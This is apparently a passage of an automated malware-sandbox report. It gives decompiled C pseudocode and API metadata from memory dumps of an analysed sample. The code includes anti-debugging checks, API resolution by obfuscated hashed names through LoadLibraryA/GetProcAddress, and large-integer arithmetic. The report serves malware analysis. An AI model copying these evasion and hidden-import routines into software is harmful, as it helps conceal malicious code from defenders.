    • Source File: 00000000.00000002.302085687.000000006E4D9000.00000020.00020000.sdmp, Offset: 6E4D9000, based on PE: false
    Similarity
    • API ID: ChangeFindFirstNotification
    • String ID:
    • API String ID: 1065410024-0
    • Opcode ID: 8f80be927b503291443354e56e0f741bfbfbcd7a40bd9d56648b641ba655c3f6
    • Instruction ID: 32dbc44fc5c4c2c59cb24c301aebf41deef0b5f2eb783bf182b1b6dd09ca35bd
    • Opcode Fuzzy Hash: 8f80be927b503291443354e56e0f741bfbfbcd7a40bd9d56648b641ba655c3f6
    • Instruction Fuzzy Hash: CD31E373A04E008BDF48CFB8C5B5EA977A1EB56315F02802EF68943781EE355649CB5A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6E4CD430(void* __eflags, intOrPtr _a4) {
    				void* _t6;
    				intOrPtr _t8;
    
    				_t8 = _a4;
    				if((E6E4B4C00(_t8, 0) & 0x00000001) == 0) {
    					E6E4CF5C0(0, E6E4B8AE0(0x46a76f));
    					_t6 = RtlAllocateHeap( *0x6e4d7a70, 0, _t8 + 4); // executed
    					return _t6;
    				}
    				return 0;
    			}

    APIs
    • RtlAllocateHeap.NTDLL(00000000,?,?,?,?,?,00000000,?), ref: 6E4CD46E
    Memory Dump Source
    • Source File: 00000000.00000002.302014252.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
    • Associated: 00000000.00000002.302010138.000000006E4B0000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.302065111.000000006E4D3000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.302071968.000000006E4D5000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.302078936.000000006E4D8000.00000002.00020000.sdmp
    Similarity
    • API ID: AllocateHeap
    • String ID:
    • API String ID: 1279760036-0
    • Opcode ID: ffea83125470c542ad174689753ddc126d6f66f3df633b6c9700c6f648fc17b7
    • Instruction ID: c14c8ae965d5c8a220e45535c3ea77b12b9e00b9c265922c3b874d3007cc102d
    • Opcode Fuzzy Hash: ffea83125470c542ad174689753ddc126d6f66f3df633b6c9700c6f648fc17b7
    • Instruction Fuzzy Hash: 72E086AAD8511036D94022F27C02FD6355C9B16AAEF150823FE0D72281F652751145F7
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • HeapCreate.KERNELBASE(00000000,00001000,00000000,?,6E4E8D36,?), ref: 6E4EB793
    Memory Dump Source
    • Source File: 00000000.00000002.302085687.000000006E4D9000.00000020.00020000.sdmp, Offset: 6E4D9000, based on PE: false
    Similarity
    • API ID: CreateHeap
    • String ID:
    • API String ID: 10892065-0
    • Opcode ID: 4618477801a4207e20c601e8ed89a47c30499534566c41abaf66f597c55e3817
    • Instruction ID: 71074f18382ba59c76f494f2d0b8e23cf71edf40df02b5a0f2bc637350d06a33
    • Opcode Fuzzy Hash: 4618477801a4207e20c601e8ed89a47c30499534566c41abaf66f597c55e3817
    • Instruction Fuzzy Hash: 22D09736550B049FDF006FB06C09BA23BDCC7C4391F158437BA0DCAA40F930C480C100
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • __encode_pointer.LIBCMT ref: 6E4EB1D8
      • Part of subcall function 6E4EB164: RtlEncodePointer.NTDLL(00000000,?,6E4EB1DD,00000000,6E4F1286,6E51A5F8,00000000,00000314,?,6E4EB0EF,6E51A5F8,6E504440,00012010), ref: 6E4EB1CB
    Memory Dump Source
    • Source File: 00000000.00000002.302085687.000000006E4D9000.00000020.00020000.sdmp, Offset: 6E4D9000, based on PE: false
    Similarity
    • API ID: EncodePointer__encode_pointer
    • String ID:
    • API String ID: 4150071819-0
    • Opcode ID: 88dfec34f3c22205ce83f1d5bb820faabfdb8689d940ef1222c4eb8b28383419
    • Instruction ID: 36bc6432ad6c58cc922301635535c7ea8b7d7d87e76c0937b06ee589d7dc36b7
    • Opcode Fuzzy Hash: 88dfec34f3c22205ce83f1d5bb820faabfdb8689d940ef1222c4eb8b28383419
    • Instruction Fuzzy Hash:
    Uniqueness

    Uniqueness Score: -1.00%

    Non-executed Functions

    APIs
    • IsDebuggerPresent.KERNEL32 ref: 6E4EE867
    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6E4EE87C
    • UnhandledExceptionFilter.KERNEL32(6E5045E0), ref: 6E4EE887
    • GetCurrentProcess.KERNEL32(C0000409), ref: 6E4EE8A3
    • TerminateProcess.KERNEL32(00000000), ref: 6E4EE8AA
    Memory Dump Source
    • Source File: 00000000.00000002.302085687.000000006E4D9000.00000020.00020000.sdmp, Offset: 6E4D9000, based on PE: false
    Similarity
    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
    • String ID:
    • API String ID: 2579439406-0
    • Opcode ID: 34a4eb845d8c23ad7d3e15dcd17b6dd08de02e93e9052ba23093b2924b54c711
    • Instruction ID: 042f7d2c76da5fbaa7f660e0e809d8a5587c0d08d57468cbc1f322d44e24039b
    • Opcode Fuzzy Hash: 34a4eb845d8c23ad7d3e15dcd17b6dd08de02e93e9052ba23093b2924b54c711
    • Instruction Fuzzy Hash: DE21FCB8900B44DFCF02DF65D646A843BF5BB4A355F12841AF60987B42EF785988CF85
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 87%
    			E6E4CF870(signed int _a4, intOrPtr _a8) {
    				CHAR* _v20;
    				char _v24;
    				intOrPtr _v28;
    				intOrPtr _v32;
    				intOrPtr _v36;
    				char _v136;
    				void* _t72;
    				void* _t77;
    				intOrPtr* _t80;
    				void* _t86;
    				void* _t90;
    				void* _t91;
    				void* _t94;
    				signed int _t98;
    				void* _t100;
    				signed char _t105;
    				signed int _t110;
    				void* _t111;
    				void* _t113;
    				void* _t114;
    				char _t117;
    				signed int _t118;
    				signed int _t125;
    				void* _t126;
    				intOrPtr _t129;
    				intOrPtr _t134;
    				intOrPtr _t135;
    				intOrPtr* _t137;
    				intOrPtr _t139;
    				void* _t140;
    				_Unknown_base(*)()* _t147;
    				char* _t148;
    				intOrPtr _t149;
    				CHAR* _t152;
    				signed char* _t153;
    				void* _t155;
    				void* _t156;
    				void* _t157;
    				void* _t158;
    				void* _t164;
    				void* _t166;
    				void* _t167;
    				void* _t172;
    				void* _t177;
    
    				_t118 = _a4;
    				_t147 = 0;
    				_t180 = _t118;
    				if(_t118 != 0) {
    					_t72 = E6E4CB420(_t180, _t118);
    					_t158 = _t157 + 4;
    					_t134 =  *((intOrPtr*)(_t72 + 0x60));
    					_t181 =  *((intOrPtr*)(_t134 + _t118 + 0x18));
    					if( *((intOrPtr*)(_t134 + _t118 + 0x18)) != 0) {
    						_v32 =  *((intOrPtr*)(_t72 + 0x64));
    						_t135 = _t134 + _t118;
    						_t148 = E6E4B2640(0, E6E4B6CC0(_t181, E6E4B2640(0,  *((intOrPtr*)(_t135 + 0x24))),  ~_t118));
    						_v28 = _t135;
    						_t77 = E6E4B2640(0,  *((intOrPtr*)(_t135 + 0x20)));
    						_t80 = E6E4B2640(0, E6E4B2640(0, _t118) + _t77);
    						_t164 = _t158 + 0x30;
    						_t137 = _t80;
    						_t129 = 0;
    						_t119 =  &_v136;
    						0;
    						0;
    						0;
    						do {
    							_v36 = _t129;
    							_v20 = _t148;
    							_t149 =  *_t137;
    							E6E4B6CC0(0, _t149, _a4);
    							E6E4BAF10(_t119, 0x64);
    							_t166 = _t164 + 0x10;
    							_t85 =  *((intOrPtr*)(_t149 + _a4));
    							if( *((intOrPtr*)(_t149 + _a4)) != 0) {
    								_t155 = _t149 + _a4;
    								_t126 = 0;
    								do {
    									_t117 = E6E4B4AE0(0, _t85);
    									_t166 = _t166 + 4;
    									 *((char*)(_t156 + _t126 - 0x84)) = _t117;
    									_t85 =  *(_t155 + _t126 + 1) & 0x000000ff;
    									_t126 = _t126 + 1;
    								} while (_t85 != 0);
    							}
    							_push(0xffffffff);
    							_t119 =  &_v136;
    							_t86 = E6E4B8E60( &_v136);
    							_t167 = _t166 + 8;
    							if(_t86 == _a8) {
    								_t90 = E6E4B6CC0(__eflags,  *((intOrPtr*)(_v28 + 0x1c)), _a4);
    								_t91 = E6E4B8AE0(0xab29d786);
    								_t147 = E6E4B8AE0(0xab29d786) +  *((intOrPtr*)(_t90 + ( *_v20 & 0x0000ffff) * 4)) - _t91 + _a4;
    								_t139 = _v28;
    								E6E4B6CC0(__eflags,  *((intOrPtr*)(_t90 + ( *_v20 & 0x0000ffff) * 4)), _a4);
    								_t94 = E6E4B8AE0(0xea92e690);
    								_t172 = _t167 + 0x1c;
    								__eflags = _t147 - _t139;
    								if(_t147 > _t139) {
    									_t140 = _t139 - _t94;
    									_t38 = _v32 - 0x1d43e3e4; // -490988516
    									__eflags = _t147 - _t140 + _t38;
    									if(_t147 < _t140 + _t38) {
    										__eflags = 1;
    										if(1 != 0) {
    											_t98 =  *_t147;
    											__eflags = _t98 - 0x2e;
    											if(_t98 != 0x2e) {
    												_t125 = 0;
    												__eflags = 0;
    												do {
    													 *(_t156 + _t125 - 0x84) = _t98;
    													_t98 =  *(_t147 + _t125 + 1) & 0x000000ff;
    													_t125 = _t125 + 1;
    													__eflags = _t98 - 0x2e;
    												} while (_t98 != 0x2e);
    											}
    											_t44 = _t147 + 1; // 0x2
    											_v20 = 0 + _t44;
    											 *((short*)(_t156 + 0xffffffffffffff7c)) = 0x642e;
    											_t100 = E6E4B8AE0(0x82efa8f);
    											E6E4B8AE0(0x82efa8f);
    											 *((char*)(_t156 + 0xffffffffffffff7e)) = 0x6c;
    											E6E4B8AE0(0x82efa88);
    											 *((char*)(_t156 + _t100 - 0x84)) = E6E4B27A0(0xe0);
    											 *((char*)(_t156 + 0xffffffffffffff80)) = 0;
    											_v24 = 0;
    											_t105 = E6E4B94A0( *(0 + _t147 + 1) & 0x000000ff, 0x23);
    											_t177 = _t172 + 0x18;
    											__eflags = _t105 & 0x00000001;
    											if((_t105 & 0x00000001) == 0) {
    												_t152 = _v20;
    											} else {
    												_t110 = _v20[1];
    												__eflags = _t110;
    												if(_t110 == 0) {
    													_t152 =  &_v24;
    												} else {
    													_t63 = _t147 + 3; // 0x4
    													_t153 = 0 + _t63;
    													do {
    														_t111 = E6E4B8AE0(0x30866b89);
    														E6E4B6CC0(__eflags, _t110, 0xffffffd0);
    														_t113 = E6E4B2640(0, _v24 + _v24 + (_v24 + _v24) * 4);
    														_t177 = _t177 + 0x14;
    														_v24 = _t110 - _t111 - _t113 + 0x38a890d5;
    														_t110 =  *_t153 & 0x000000ff;
    														_t153 =  &(_t153[1]);
    														__eflags = _t110;
    													} while (_t110 != 0);
    													_t152 =  &_v24;
    												}
    											}
    											_t147 = GetProcAddress(LoadLibraryA( &_v136), _t152);
    										}
    									}
    								}
    							} else {
    								goto L7;
    							}
    							goto L23;
    							L7:
    							_t137 = _t137 + 4;
    							_t148 =  &(_v20[2]);
    							_t114 = E6E4B2640(0, 1);
    							_t164 = _t167 + 8;
    							_t129 = _v36 - _t114;
    						} while (_t129 <  *((intOrPtr*)(_v28 + 0x18)));
    						_t147 = 0;
    					}
    				}
    				L23:
    				return _t147;
    			}

    APIs
    • LoadLibraryA.KERNEL32(0000642E), ref: 6E4CFB26
    • GetProcAddress.KERNEL32(00000000,?), ref: 6E4CFB2E
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.302014252.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
    • Associated: 00000000.00000002.302010138.000000006E4B0000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.302065111.000000006E4D3000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.302071968.000000006E4D5000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.302078936.000000006E4D8000.00000002.00020000.sdmp
    Similarity
    • API ID: AddressLibraryLoadProc
    • String ID: .d$l
    • API String ID: 2574300362-2610669624
    • Opcode ID: 0f132fc2ddb29be5cad10d1709c7740e559182817a0f314552c4f2735866ebe1
    • Instruction ID: 228500356bddaee1db1068a84e12f4f4961b9e703e992e445815a175a40ee3fc
    • Opcode Fuzzy Hash: 0f132fc2ddb29be5cad10d1709c7740e559182817a0f314552c4f2735866ebe1
    • Instruction Fuzzy Hash: 17715ABAD002165BCF008EF4AC81FEE7BA9AF1525DF14046AED4967341EB359A05C7F2
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6E4C1D60(void* __ecx, void* __eflags, signed int _a4, signed int* _a8, signed int _a12) {
    				signed int _v20;
    				signed int _v24;
    				signed int _v28;
    				signed int _v32;
    				signed int _v36;
    				signed int _v40;
    				signed char _t63;
    				signed int _t64;
    				void* _t65;
    				void* _t66;
    				void* _t67;
    				void* _t71;
    				signed int _t72;
    				signed char _t73;
    				void* _t75;
    				signed int _t79;
    				signed char _t81;
    				signed char _t85;
    				signed int _t93;
    				signed int _t94;
    				signed int _t95;
    				signed int _t96;
    				signed int _t97;
    				signed char _t99;
    				signed int _t101;
    				signed int _t102;
    				signed int _t105;
    				signed int _t109;
    				signed int _t110;
    				signed int* _t116;
    				void* _t117;
    				signed int _t118;
    				void* _t119;
    				signed int _t120;
    				void* _t121;
    				void* _t123;
    				void* _t124;
    				void* _t125;
    
    				_t118 = _a4;
    				do {
    					_t93 =  *_t118;
    					_t118 = _t118 + 1;
    					_t63 = E6E4B4C00(E6E4C2940(__ecx, __eflags, _t93), 0);
    					_t121 = _t121 + 0xc;
    				} while ((_t63 & 0x00000001) == 0);
    				if(_t93 == 0x2b) {
    					_t64 = 0;
    					__eflags = 0;
    					goto L6;
    				} else {
    					_t64 = 1;
    					if(_t93 == 0x2d) {
    						L6:
    						_v28 = _t64;
    						_t93 =  *_t118;
    						_t118 = _t118 + 1;
    						__eflags = _t118;
    					} else {
    						_v28 = 0;
    					}
    				}
    				_t65 = E6E4B27A0(0xbc);
    				_t123 = _t121 + 4;
    				if(( !_a12 | 0x00000010) != 0xffffffff || _t93 != _t65) {
    					__eflags = _a12;
    					_v24 = _a12 == 0;
    					_t66 = E6E4B27A0(0xbc);
    					_t123 = _t123 + 4;
    					__eflags = _t93 - _t66;
    					if(_t93 != _t66) {
    						_t101 = _t93;
    						_t67 = 0xa;
    						_t94 = _a12;
    						_t110 = _v24;
    					} else {
    						_t94 = _a12;
    						_t110 = _v24;
    						goto L15;
    					}
    					goto L16;
    				} else {
    					_t134 = ( *_t118 | 0x00000020) - 0x78;
    					if(( *_t118 | 0x00000020) != 0x78) {
    						_t94 = _a12;
    						__eflags = _t94;
    						_t16 = _t94 == 0;
    						__eflags = _t16;
    						_t110 = _t109 & 0xffffff00 | _t16;
    						L15:
    						_t67 = 8;
    						_t101 = 0x30;
    						L16:
    						__eflags = _t110;
    						_t95 =  !=  ? _t67 : _t94;
    					} else {
    						_t101 =  *(_t118 + 1);
    						_t118 = _t118 + 2;
    						_t95 = 0x10;
    					}
    				}
    				_v32 = _t95;
    				_v36 = 0xffffffff / _t95;
    				_v40 = 0xffffffff % _t95;
    				_v20 = 0;
    				_t119 = _t118 - 1;
    				_v24 = 0;
    				while(1) {
    					_t96 = _t101;
    					_t71 = E6E4C0E90(_t134, _t101);
    					_t124 = _t123 + 4;
    					_t135 = _t71;
    					if(_t71 == 0) {
    						goto L22;
    					}
    					_t117 = _t96 - 0x30;
    					E6E4B6CC0(_t135, _t96, E6E4B8AE0(0xf7d1055c));
    					_t125 = _t124 + 0xc;
    					L24:
    					if(_t117 < _v32) {
    						_t99 = (_t96 & 0xffffff00 | _v24 < 0x00000000) & 0xffffff00 | _v24 > 0x00000000;
    						_t81 = E6E4B7600(_v20, _v36);
    						_t123 = _t125 + 8;
    						_v24 = 0xffffffff;
    						if((_t81 & 0x00000001) != _t99 || (((_t81 ^ 0x00000001 | _t99) ^ 0x00000001) & 0x00000001) != 0) {
    							L19:
    							_t101 =  *((char*)(_t119 + 1));
    							_t119 = _t119 + 1;
    							_t134 = _t119;
    							continue;
    						} else {
    							_t85 = E6E4B4C00(_v20, _v36);
    							_t123 = _t123 + 8;
    							if((_t85 & 0x00000001) == 0) {
    								L18:
    								_v20 = _v20 * _v32 + _t117;
    								_v24 = 1;
    								goto L19;
    							} else {
    								if(_t117 > _v40) {
    									goto L19;
    								} else {
    									goto L18;
    								}
    							}
    						}
    					}
    					L30:
    					_t97 = _v24;
    					__eflags = _t97;
    					if(_t97 < 0) {
    						_v20 = 0xffffffff;
    					} else {
    						_t75 = E6E4B2640(0, 0x7e3b8ccc);
    						_t125 = _t125 + 8;
    						_t102 = _v20;
    						__eflags = _v28;
    						_t78 =  ==  ? _t102 : _t75 - _t102 + 0x7e3b8ccc;
    						_v20 =  ==  ? _t102 : _t75 - _t102 + 0x7e3b8ccc;
    					}
    					_t116 = _a8;
    					_t73 = E6E4B6DF0(_t116, 0);
    					__eflags = _t73 & 0x00000001;
    					if((_t73 & 0x00000001) == 0) {
    						__eflags = _t97;
    						_t120 =  ==  ? _a4 : _t119;
    						__eflags = _t120;
    						 *_t116 = _t120;
    					}
    					return _v20;
    					L22:
    					_t72 = E6E4C09C0(__eflags, _t96);
    					_t125 = _t124 + 4;
    					__eflags = _t72;
    					if(__eflags != 0) {
    						_t79 = E6E4C5AB0(__eflags, _t96);
    						_t125 = _t125 + 4;
    						__eflags = _t79;
    						_t105 = (0 | _t79 == 0x00000000) << 5;
    						__eflags = _t105;
    						_t117 = _t96 +  ~_t105 - 0x37;
    						goto L24;
    					}
    					goto L30;
    				}
    			}

    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.302014252.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
    • Associated: 00000000.00000002.302010138.000000006E4B0000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.302065111.000000006E4D3000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.302071968.000000006E4D5000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.302078936.000000006E4D8000.00000002.00020000.sdmp
    Similarity
    • API ID:
    • String ID: +$-
    • API String ID: 0-2137968064
    • Opcode ID: eb3fb39ec373ec46f71411f59fd2cdf12f452f93ac28192e97816e447721a499
    • Instruction ID: e1d616c4471800aebdc1f6550489c9cf95cf5f2835a4d4b6753371fcf30f1462
    • Opcode Fuzzy Hash: eb3fb39ec373ec46f71411f59fd2cdf12f452f93ac28192e97816e447721a499
    • Instruction Fuzzy Hash: 3851E8B9E002064BEF008EF89C91BEF77B8AF06718F45052BD855A7381D775951987A3
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 92%
    			E6E4CA000(signed int __edx, void* __eflags, signed int* _a4, intOrPtr _a8, signed int* _a12, intOrPtr* _a16) {
    				signed int _v20;
    				signed int _v24;
    				signed int _v28;
    				signed int _v32;
    				signed int* _v36;
    				signed int _v40;
    				signed int _v44;
    				signed int _v48;
    				signed int* _v52;
    				signed int _v56;
    				intOrPtr* _v60;
    				signed int _v64;
    				signed int _v68;
    				intOrPtr _v72;
    				signed int _v76;
    				signed int _v80;
    				signed int _v84;
    				intOrPtr _v88;
    				intOrPtr _v92;
    				intOrPtr _v96;
    				signed int _v100;
    				signed int _v104;
    				intOrPtr _v108;
    				intOrPtr _v112;
    				signed int _v116;
    				signed int _v120;
    				signed int _v124;
    				intOrPtr _v128;
    				signed int _v132;
    				signed int _v136;
    				void* _t304;
    				signed int _t305;
    				signed int* _t306;
    				void* _t308;
    				void* _t313;
    				void* _t317;
    				signed int _t320;
    				signed int _t327;
    				void* _t328;
    				signed int* _t331;
    				signed int _t341;
    				signed int _t348;
    				void* _t349;
    				void* _t358;
    				void* _t359;
    				intOrPtr _t366;
    				intOrPtr _t367;
    				signed int _t373;
    				signed int _t377;
    				void* _t387;
    				void* _t390;
    				signed int _t398;
    				signed int _t407;
    				intOrPtr* _t411;
    				signed int _t413;
    				signed int _t414;
    				signed int _t421;
    				signed char _t435;
    				signed int _t437;
    				void* _t442;
    				void* _t443;
    				signed int _t445;
    				signed int _t450;
    				signed int _t452;
    				signed int _t455;
    				signed int _t458;
    				signed int _t460;
    				signed int* _t465;
    				intOrPtr _t467;
    				signed int* _t468;
    				intOrPtr _t469;
    				signed int _t474;
    				signed char _t475;
    				signed int _t480;
    				signed int _t481;
    				intOrPtr _t484;
    				signed int* _t489;
    				signed int _t494;
    				signed int _t503;
    				signed int _t508;
    				signed int _t509;
    				signed int _t511;
    				intOrPtr* _t513;
    				signed int* _t514;
    				signed int _t516;
    				signed int _t517;
    				intOrPtr* _t520;
    				signed int _t521;
    				signed int _t525;
    				signed int _t526;
    				signed int _t527;
    				signed int _t530;
    				signed int _t533;
    				signed int _t536;
    				signed int* _t537;
    				signed int _t546;
    				signed char _t549;
    				signed int _t553;
    				signed int _t554;
    				intOrPtr* _t558;
    				signed int _t559;
    				signed int _t560;
    				signed int _t563;
    				signed int* _t565;
    				signed int _t566;
    				signed int _t569;
    				intOrPtr* _t570;
    				signed int _t573;
    				signed int _t576;
    				signed int _t580;
    				signed int _t582;
    				signed int _t583;
    				signed int _t585;
    				signed int _t588;
    				signed int _t592;
    				signed int _t593;
    				signed int _t595;
    				signed int* _t600;
    				intOrPtr* _t604;
    				signed int _t609;
    				signed int* _t610;
    				signed int _t611;
    				void* _t613;
    				signed int _t615;
    				void* _t618;
    				signed int* _t622;
    				signed int* _t623;
    				signed int _t626;
    				signed int* _t631;
    				intOrPtr _t632;
    				signed int* _t634;
    				signed int _t636;
    				signed int _t637;
    				void* _t641;
    				void* _t643;
    				void* _t646;
    				void* _t651;
    				void* _t655;
    				void* _t675;
    				void* _t685;
    				void* _t687;
    				void* _t688;
    				void* _t689;
    				void* _t695;
    
    				_t553 = __edx;
    				_t565 = _a12;
    				_v40 = E6E4C9120();
    				_t489 = E6E4C9120();
    				_v88 = E6E4C9120();
    				_v72 = E6E4C9120();
    				_v52 = E6E4C9120();
    				_t604 = E6E4C9120();
    				_t304 = E6E4CCA50(_t303, __edx, __eflags, _t565, _a16);
    				_t643 = _t641 - 0x78 + 8;
    				if(_t304 == 0) {
    					_t305 = E6E4C8CB0(_t565);
    					_t643 = _t643 + 4;
    					__eflags = _t305;
    					if(_t305 == 0) {
    						_t306 = _t565;
    						_t520 = _a16;
    						_t566 =  *_t520;
    						__eflags = _t566 - 1;
    						_v36 = _t489;
    						_v60 = _t604;
    						if(_t566 != 1) {
    							_v20 =  *_t306;
    							_t308 = E6E4B2640(0,  *_t306);
    							_v68 = 1;
    							E6E4B6CC0(__eflags, _v20, 1);
    							_v24 = _a4[1];
    							_v32 = 1;
    							_v56 = _t566;
    							_t313 = E6E4B8AE0(0xebd2701d);
    							_t646 = _t643 + 0x14;
    							_t569 = 1 - _t308 - _t566 - _t313 + 0xe3fc8a91;
    							__eflags = _v24 - _t569;
    							if(_v24 < _t569) {
    								_t465 = _a4;
    								_t634 = _t465;
    								 *(_t465 + 4) = _t569;
    								_t553 = _t569 << E6E4B8AE0(0x82efa8e);
    								__eflags = _t553;
    								_t467 = E6E4CD3B0( *((intOrPtr*)(_t634 + 8)), _t553);
    								_t646 = _t646 + 0xc;
    								 *((intOrPtr*)(_t634 + 8)) = _t467;
    							}
    							_v24 = _t569;
    							E6E4BDAD0(_a12, _t489);
    							_t570 = _v40;
    							E6E4BDAD0(_a16, _t570);
    							_v28 =  *((intOrPtr*)(_t570 + 8));
    							_t317 = E6E4B8AE0(0xc15405c3);
    							_t609 = E6E4B8AE0(0xc15405c3) +  *_t570 - _t317;
    							E6E4B6CC0(__eflags,  *_t570, 0xffffffff);
    							_t651 = _t646 + 0x20;
    							_t320 = _v28;
    							__eflags =  *(_t320 + _t609 * 4 - 4);
    							if( *(_t320 + _t609 * 4 - 4) < 0) {
    								_v64 = 0;
    								goto L23;
    							} else {
    								_t560 = 0;
    								__eflags = 0;
    								_t546 = 1;
    								_t513 = _v40;
    								0;
    								0;
    								do {
    									_v64 = (_t560 << 0x00000020 | _t546) << 1;
    									_v68 = _t546 + _t546;
    									E6E4C6740(_t546 + _t546, _t513, 0x6e4d501c);
    									_t632 =  *((intOrPtr*)(_t513 + 8));
    									_t458 = E6E4B6CC0(__eflags, 0 -  *_t513, E6E4B2640(0, 0xffffffff));
    									_t560 = _v64;
    									_t546 = _v68;
    									_t651 = _t651 + 0x18;
    									_t460 =  ~(_t458 << 2);
    									__eflags =  *(_t632 + _t460);
    								} while ( *(_t632 + _t460) >= 0);
    								__eflags = _t546 | _t560;
    								if((_t546 | _t560) == 0) {
    									L23:
    									_t610 = _v36;
    									L24:
    									_t573 =  *_t610;
    									__eflags = _t573 - _v32;
    									if(_t573 != _v32) {
    										_t94 = _t573 + 0x63cafff; // 0x63cafff
    										_t452 = E6E4B2640(_t94, E6E4B8AE0(0xe125572));
    										_t651 = _t651 + 0xc;
    										_t631 = _v36;
    										 *_t631 = _t452;
    										__eflags = _t573 - _t631[1];
    										if(_t573 >= _t631[1]) {
    											_t631[1] = _t452;
    											__eflags = _t452 << E6E4B8AE0(0x82efa8e);
    											_t455 = E6E4CD3B0(_t631[2], _t452 << E6E4B8AE0(0x82efa8e));
    											_t651 = _t651 + 0xc;
    											_t631[2] = _t455;
    										}
    										 *(_t631[2] + _v20 * 4) = 0;
    									}
    									_t574 = _v24;
    									__eflags = _v24;
    									_t611 = _v56;
    									if(__eflags <= 0) {
    										L52:
    										_t327 = E6E4B2640( *_a12, E6E4B8AE0(0x4d5574d6)) -  *_a16;
    										__eflags =  *(_a4[2] + 0x15ee3968 + _t327 * 4);
    										_t264 = _t327 + 0x457b8e5a; // 0x457b8e5a
    										_t613 = _t264;
    										_t328 = E6E4B2640(0, 0 |  *(_a4[2] + 0x15ee3968 + _t327 * 4) != 0x00000000);
    										E6E4B6CC0(__eflags, _t613,  *(_a4[2] + 0x15ee3968 + _t327 * 4) != 0);
    										_t655 = _t651 + 0x1c;
    										 *_a4 = _t613 - _t328;
    										_t331 = _v36;
    										_t615 =  *_t331;
    										__eflags = _t615;
    										if(_t615 <= 0) {
    											_v24 = 0;
    											L57:
    											_t489 = _v36;
    											 *_t489 = _v24;
    											E6E4BDAD0(_t489, _a8);
    											_t576 = _v40;
    											L58:
    											_t604 = _v60;
    											L5:
    											_push(_v88);
    											E6E4BE2C0();
    											_push(_v72);
    											E6E4BE2C0();
    											_push(_v52);
    											E6E4BE2C0();
    											_push(_t489);
    											E6E4BE2C0();
    											_push(_t576);
    											E6E4BE2C0();
    											_push(_t604);
    											return E6E4BE2C0();
    										}
    										_v20 = _t331[2];
    										_v24 = 0;
    										_t494 = 0;
    										__eflags = 0;
    										0;
    										0;
    										do {
    											_t341 = E6E4B2640(_t615, 1);
    											_v28 = _t341;
    											E6E4B6CC0(__eflags, _t615, 0xffffffff);
    											_v48 =  *((intOrPtr*)(_v20 + _t341 * 4));
    											_v44 = E6E4B3B80(0, _t494,  *((intOrPtr*)(_v20 + _t341 * 4)), 0);
    											_v32 = _t553;
    											_t580 = E6E4B3E10(0, _t494,  *((intOrPtr*)(_v20 + _t341 * 4)), 0) | _v44;
    											E6E4BB3D0(__eflags, 0, _t494, _v48, 0);
    											_t348 = E6E4C1B40(_t580, _t553 | _v32, _v68, _v64);
    											__eflags = _t348;
    											_t521 = _v24;
    											_t616 =  ==  ? _t521 : _t615;
    											__eflags = _t521;
    											_t522 =  ==  ?  ==  ? _t521 : _t615 : _t521;
    											_v24 =  ==  ?  ==  ? _t521 : _t615 : _t521;
    											_t615 = _v28;
    											 *(_v20 + _t615 * 4) = _t348;
    											_t349 = E6E4B39E0(_t553, _t521, _t348, _t553, _v68, _v64);
    											_t655 = _t655 + 0x50;
    											__eflags = _t615;
    											_t494 = _t580 - _t349;
    										} while (_t615 > 0);
    										goto L57;
    									} else {
    										_v120 = _t611 - 1;
    										E6E4B6CC0(__eflags, _t611, 0xffffffff);
    										_v116 = E6E4B6CC0(__eflags, E6E4B6CC0(__eflags, _t611, 0x381a4a88), 0xfffffffe) + 0xc7e5b578;
    										_t525 = _t611 - E6E4B2640(0, 1);
    										_v104 = _t525;
    										_v100 = _t525 * 4;
    										_t358 = E6E4B6CC0(__eflags, _v20, 0xaa94244d);
    										_t359 = E6E4B8AE0(0xa2badec1);
    										_v108 = E6E4B8AE0(0x8474d380) + _v20 - _t611 + 0x73a5d6f5;
    										_t366 = E6E4B2640(0,  !_t611);
    										_t675 = _t651 + 0x38;
    										_v96 = _t366;
    										_t367 = 0;
    										_v112 = _t358 - _t611 - _t359 + 0xce847fe1;
    										do {
    											_v128 = _t367;
    											_v124 = E6E4B2640(_v112, _t367) + 0x317b801f;
    											_t526 = E6E4B6CC0(__eflags, _t574, 0xffffffff);
    											_t582 = _v36[2];
    											_v24 = _t526;
    											_t126 = _t526 + 0x3c2de719; // 0x3c2de719
    											_t373 = E6E4B6CC0(__eflags, _t126, _t611);
    											_v32 = _t373;
    											_t128 = _t373 - 0x3c2de719; // -1009641241
    											_v20 =  *((intOrPtr*)(_t582 + 0xf48639c + _t373 * 4));
    											_v48 = _t582;
    											_v44 = _t128;
    											_t377 = E6E4B2640(0, E6E4B2640(0, _t128) + 1);
    											E6E4B6CC0(__eflags, _t128, 0xffffffff);
    											_t554 =  *((intOrPtr*)(_t582 + _t377 * 4));
    											_v80 = _t554;
    											_t527 =  *((intOrPtr*)(_v40 + 8));
    											_v84 = _t527;
    											_v92 =  *((intOrPtr*)(_t527 + _v120 * 4));
    											_t618 = E6E4C1B40(_t554, _v20,  *((intOrPtr*)(_t527 + _v120 * 4)), 0);
    											_t583 = _t554;
    											__eflags = _t618 - E6E4B2DD0(0xf7d10573, 0x7856dfe0);
    											asm("sbb eax, edx");
    											_t386 =  <  ? _t583 : 0;
    											_v28 =  <  ? _t583 : 0;
    											_t503 =  <  ? _t618 : 0xffffffff;
